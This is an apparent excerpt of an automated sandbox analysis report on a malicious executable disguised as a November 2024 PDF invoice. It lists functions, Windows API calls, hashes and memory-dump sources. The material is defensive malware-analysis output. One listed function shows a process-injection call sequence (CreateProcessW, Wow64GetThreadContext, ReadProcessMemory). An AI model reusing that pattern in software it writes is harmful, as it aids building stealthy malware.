                                                                                                                      • Opcode Fuzzy Hash: 1a9a48b366fdb3534b659ec4f69353e95d34beb7cbb69799a9d21069289ec451
                                                                                                                      • Instruction Fuzzy Hash: BBF11671608305DFCB24DF28C484A6ABBE5BF88314F14892EF89A9B251D775ED45CF82
                                                                                                                      Function 007543DB Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 00754401
                                                                                                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 007544A6
                                                                                                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 007544C3
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: IconNotifyShell_$_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1505330794-0
                                                                                                                      • Opcode ID: 6f91ddc0e08d620adfebf211ff9fc8ccff6498a4e4b55ccab5da65a16810a297
                                                                                                                      • Instruction ID: ee4735bc3dc9e65beef0d3021d4126705b480647b39e67d05511d9ae29cb0c4d
                                                                                                                      • Opcode Fuzzy Hash: 6f91ddc0e08d620adfebf211ff9fc8ccff6498a4e4b55ccab5da65a16810a297
                                                                                                                      • Instruction Fuzzy Hash: 3F3150705057419FD720DF64D884BDBBBF8BB48309F00492EE99A83251E7B96988CB92
                                                                                                                      Function 0077594C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __FF_MSGBANNER.LIBCMT ref: 00775963
                                                                                                                        • Part of subcall function 0077A3AB: __NMSG_WRITE.LIBCMT ref: 0077A3D2
                                                                                                                        • Part of subcall function 0077A3AB: __NMSG_WRITE.LIBCMT ref: 0077A3DC
                                                                                                                      • __NMSG_WRITE.LIBCMT ref: 0077596A
                                                                                                                        • Part of subcall function 0077A408: GetModuleFileNameW.KERNEL32(00000000,008143BA,00000104,?,00000001,00000000), ref: 0077A49A
                                                                                                                        • Part of subcall function 0077A408: ___crtMessageBoxW.LIBCMT ref: 0077A548
                                                                                                                        • Part of subcall function 007732DF: ___crtCorExitProcess.LIBCMT ref: 007732E5
                                                                                                                        • Part of subcall function 007732DF: ExitProcess.KERNEL32 ref: 007732EE
                                                                                                                        • Part of subcall function 00778D68: __getptd_noexit.LIBCMT ref: 00778D68
                                                                                                                      • RtlAllocateHeap.NTDLL(018F0000,00000000,00000001,00000000,?,?,?,00771013,?), ref: 0077598F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1372826849-0
                                                                                                                      • Opcode ID: 2561a4b6d56e2452bedc5e30313994bece53bff15843115ae8b5408d757b330a
                                                                                                                      • Instruction ID: e9b7bae599daa65208a9d3d7e3e1e866ab85026df09d1a90e419a76f8fc80e96
                                                                                                                      • Opcode Fuzzy Hash: 2561a4b6d56e2452bedc5e30313994bece53bff15843115ae8b5408d757b330a
                                                                                                                      • Instruction Fuzzy Hash: 8C01D631341B15EEEE212B34D84966E72489F427F0F10C136F60D9B1C1DEBDAD014A61
                                                                                                                      Function 007B9B2C Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,007B97D2,?,?,?,?,?,00000004), ref: 007B9B45
                                                                                                                      • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,007B97D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 007B9B5B
                                                                                                                      • CloseHandle.KERNEL32(00000000,?,007B97D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 007B9B62
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File$CloseCreateHandleTime
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3397143404-0
                                                                                                                      • Opcode ID: d09704b7b4620657d6702d4d7288206e880809aa1bb2633dc88b7c8b82db4aa9
                                                                                                                      • Instruction ID: 230612e940626c119abb87b8ce971df7adb26fe81a4694d47f44c617cd103778
                                                                                                                      • Opcode Fuzzy Hash: d09704b7b4620657d6702d4d7288206e880809aa1bb2633dc88b7c8b82db4aa9
                                                                                                                      • Instruction Fuzzy Hash: 3EE08632181228B7D7211B54EC09FCA7F28AB05761F148121FB25A90E087B62611979C
                                                                                                                      Function 007B8F97 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _free.LIBCMT ref: 007B8FA5
                                                                                                                        • Part of subcall function 00772F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00779C64), ref: 00772FA9
                                                                                                                        • Part of subcall function 00772F95: GetLastError.KERNEL32(00000000,?,00779C64), ref: 00772FBB
                                                                                                                      • _free.LIBCMT ref: 007B8FB6
                                                                                                                      • _free.LIBCMT ref: 007B8FC8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 776569668-0
                                                                                                                      • Opcode ID: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                                                                                                                      • Instruction ID: c50d2a78a5e9f5e0753d9b1935cc7dba445f7a4b2aa1aa02466b312dd18cf473
                                                                                                                      • Opcode Fuzzy Hash: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                                                                                                                      • Instruction Fuzzy Hash: FEE012A16097018ECE64A578AD44BF357FE5F48390B28081DF45DDB143DE2CE842C524
                                                                                                                      Function 0075AB23 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: CALL
                                                                                                                      • API String ID: 0-4196123274
                                                                                                                      • Opcode ID: a6711eaa1e395620eeab2efe8df9f0740df5f6bbd4b38f2e27b40316b160e663
                                                                                                                      • Instruction ID: 6c4f6eb335bada358de1d23111f6e1a57b9bae56795c8357a5b0c51708d0b963
                                                                                                                      • Opcode Fuzzy Hash: a6711eaa1e395620eeab2efe8df9f0740df5f6bbd4b38f2e27b40316b160e663
                                                                                                                      • Instruction Fuzzy Hash: 4A223870608341DFCB24DF14C495AAABBF1BF45301F14896DE89A8B262D779ED49CB82
                                                                                                                      Function 0075492E Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • IsThemeActive.UXTHEME ref: 00754992
                                                                                                                        • Part of subcall function 007735AC: __lock.LIBCMT ref: 007735B2
                                                                                                                        • Part of subcall function 007735AC: DecodePointer.KERNEL32(00000001,?,007549A7,007A81BC), ref: 007735BE
                                                                                                                        • Part of subcall function 007735AC: EncodePointer.KERNEL32(?,?,007549A7,007A81BC), ref: 007735C9
                                                                                                                        • Part of subcall function 00754A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00754A73
                                                                                                                        • Part of subcall function 00754A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00754A88
                                                                                                                        • Part of subcall function 00753B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00753B7A
                                                                                                                        • Part of subcall function 00753B4C: IsDebuggerPresent.KERNEL32 ref: 00753B8C
                                                                                                                        • Part of subcall function 00753B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,008162F8,008162E0,?,?), ref: 00753BFD
                                                                                                                        • Part of subcall function 00753B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00753C81
                                                                                                                      • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 007549D2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1438897964-0
                                                                                                                      • Opcode ID: 0933d6fb93b306a524e0ec145e58d49a26b338d4e6b37b904d9ab28e84ff69c2
                                                                                                                      • Instruction ID: 4f9f56280749ffc7a747f4dd221ffe97c104dcb8751f6bfa50490cdbc9e84824
                                                                                                                      • Opcode Fuzzy Hash: 0933d6fb93b306a524e0ec145e58d49a26b338d4e6b37b904d9ab28e84ff69c2
                                                                                                                      • Instruction Fuzzy Hash: 0C116A71908311DBC700EF28E80998ABBF8FF94750F00851EF485932A1EBB89659CB96
                                                                                                                      Function 00770FF6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0077594C: __FF_MSGBANNER.LIBCMT ref: 00775963
                                                                                                                        • Part of subcall function 0077594C: __NMSG_WRITE.LIBCMT ref: 0077596A
                                                                                                                        • Part of subcall function 0077594C: RtlAllocateHeap.NTDLL(018F0000,00000000,00000001,00000000,?,?,?,00771013,?), ref: 0077598F
                                                                                                                      • std::exception::exception.LIBCMT ref: 0077102C
                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 00771041
                                                                                                                        • Part of subcall function 007787DB: RaiseException.KERNEL32(?,?,?,0080BAF8,00000000,?,?,?,?,00771046,?,0080BAF8,?,00000001), ref: 00778830
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3902256705-0
                                                                                                                      • Opcode ID: 592d018c43c334dee512063b40b3792e6238c940ae352cda591065763eb6f4a5
                                                                                                                      • Instruction ID: f1b351b1f61827455b60c9183e161a1122bf4a6394c303415d1fe05429245982
                                                                                                                      • Opcode Fuzzy Hash: 592d018c43c334dee512063b40b3792e6238c940ae352cda591065763eb6f4a5
                                                                                                                      • Instruction Fuzzy Hash: 2BF0F43464025DE6CF20EA9CEC09ADF77AC9F003D0F608425F90C96182EFF89A91D2E1
                                                                                                                      Function 0077582D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __lock_file_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 26237723-0
                                                                                                                      • Opcode ID: ae9d1fcc397d940a832e24e3c1a71191e0f5945b72ddaa5f71021c6cdadb3a05
                                                                                                                      • Instruction ID: 337e3d9dc1f240713db62682d8731da08466e836d484096f5415b2ae5a8b6435
                                                                                                                      • Opcode Fuzzy Hash: ae9d1fcc397d940a832e24e3c1a71191e0f5945b72ddaa5f71021c6cdadb3a05
                                                                                                                      • Instruction Fuzzy Hash: F6018871C00604EBCF51AFA5CC0999E7B61BF403E0F14C215F81C5A1A1DB798651DB92
                                                                                                                      Function 007755D6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00778D68: __getptd_noexit.LIBCMT ref: 00778D68
                                                                                                                      • __lock_file.LIBCMT ref: 0077561B
                                                                                                                        • Part of subcall function 00776E4E: __lock.LIBCMT ref: 00776E71
                                                                                                                      • __fclose_nolock.LIBCMT ref: 00775626
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2800547568-0
                                                                                                                      • Opcode ID: 2c868f2c19c4a6da4ce27f667804054267d1de3733e9b7ca0fa9b65a6cbd2d02
                                                                                                                      • Instruction ID: 76dd5afdacce1878262677010bc6db30a3c0f12977f1968636e21aa4529c5bfa
                                                                                                                      • Opcode Fuzzy Hash: 2c868f2c19c4a6da4ce27f667804054267d1de3733e9b7ca0fa9b65a6cbd2d02
                                                                                                                      • Instruction Fuzzy Hash: EAF09071941A04DADF60AB75C80EB6E76A16F41BF4F55C209A42CEB1C1CFBC8A019B56
                                                                                                                      Function 018D129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 018D1A5B
                                                                                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 018D1AF1
                                                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 018D1B13
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1673001125.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_18d0000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2438371351-0
                                                                                                                      • Opcode ID: 7bc2eb71131a5ca0d961fb64b4ce1da28befc4a8e94ed8bda1bc50d134690387
                                                                                                                      • Instruction ID: 22f64beee1131dca4797a1390a8efa7d3dc52c16d9388e5bba72064ddedfcdad
                                                                                                                      • Opcode Fuzzy Hash: 7bc2eb71131a5ca0d961fb64b4ce1da28befc4a8e94ed8bda1bc50d134690387
                                                                                                                      • Instruction Fuzzy Hash: 3E12CE24E18658C6EB24DF64D8547DEB232EF68300F1090E9D10DEB7A5E77A4F81CB5A
                                                                                                                      Function 007900D6 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClearVariant
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1473721057-0
                                                                                                                      • Opcode ID: fcaccbde6492e2020defe28c25745179e62f621fd42e33e707836ae4c252b587
                                                                                                                      • Instruction ID: 2d6016226db2d7c42b3aef0ae0bb860d1275a85374c76c71ca09a4083192a84e
                                                                                                                      • Opcode Fuzzy Hash: fcaccbde6492e2020defe28c25745179e62f621fd42e33e707836ae4c252b587
                                                                                                                      • Instruction Fuzzy Hash: 02410874604341DFDB14DF14C488B5ABBE1BF45318F1989ACE9994B362C379EC49CB52
                                                                                                                      Function 00754F3D Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00754D13: FreeLibrary.KERNEL32(00000000,?), ref: 00754D4D
                                                                                                                        • Part of subcall function 0077548B: __wfsopen.LIBCMT ref: 00775496
                                                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,008162F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00754F6F
                                                                                                                        • Part of subcall function 00754CC8: FreeLibrary.KERNEL32(00000000), ref: 00754D02
                                                                                                                        • Part of subcall function 00754DD0: _memmove.LIBCMT ref: 00754E1A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Library$Free$Load__wfsopen_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1396898556-0
                                                                                                                      • Opcode ID: b90145105b8f2335d6531fde513e3877a5f0a24a2d7e041344d9de6303254cc8
                                                                                                                      • Instruction ID: 9b85996ae213e75c27b11bea8dabc6836dfdf15f2f7e8367d93d9561e93f5a78
                                                                                                                      • Opcode Fuzzy Hash: b90145105b8f2335d6531fde513e3877a5f0a24a2d7e041344d9de6303254cc8
                                                                                                                      • Instruction Fuzzy Hash: B111C432700305EACB24FF74CC1ABEE77A49F40706F10842AFD42A61C1DEB99A4997A0
                                                                                                                      Function 007901AF Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClearVariant
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1473721057-0
                                                                                                                      • Opcode ID: 0875be9da7930a1777b74c2b16a5c4f7f7d598a8eb6099e88c27fcbcebb6c13c
                                                                                                                      • Instruction ID: 06a09da074c547cfc41c2e4ae2cc0e8e6e0f14fa9d506e5e51e3cb69596bc5ea
                                                                                                                      • Opcode Fuzzy Hash: 0875be9da7930a1777b74c2b16a5c4f7f7d598a8eb6099e88c27fcbcebb6c13c
                                                                                                                      • Instruction Fuzzy Hash: 522124B4608341DFCB14DF24C449A5ABBF0BF88304F04896CE98A47721D779E849CB92
                                                                                                                      Function 00774A93 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __lock_file.LIBCMT ref: 00774AD6
                                                                                                                        • Part of subcall function 00778D68: __getptd_noexit.LIBCMT ref: 00778D68
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __getptd_noexit__lock_file
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2597487223-0
                                                                                                                      • Opcode ID: f4442efe19712182886ca9c0ec92345d44931dd1abd569fb307b658338810eb7
                                                                                                                      • Instruction ID: b0e3878bb30b81d8cde267bd33240aaf88a82152fa9b6f6fe86a6d583b79054a
                                                                                                                      • Opcode Fuzzy Hash: f4442efe19712182886ca9c0ec92345d44931dd1abd569fb307b658338810eb7
                                                                                                                      • Instruction Fuzzy Hash: 26F0A471940209DBDFA1AF74CC0E79E3661AF003A5F05C514F42C9A1E1CB7C8950DF51
                                                                                                                      Function 00754FAA Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • FreeLibrary.KERNEL32(?,?,008162F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00754FDE
                                                                                                                      Memory Dump Source
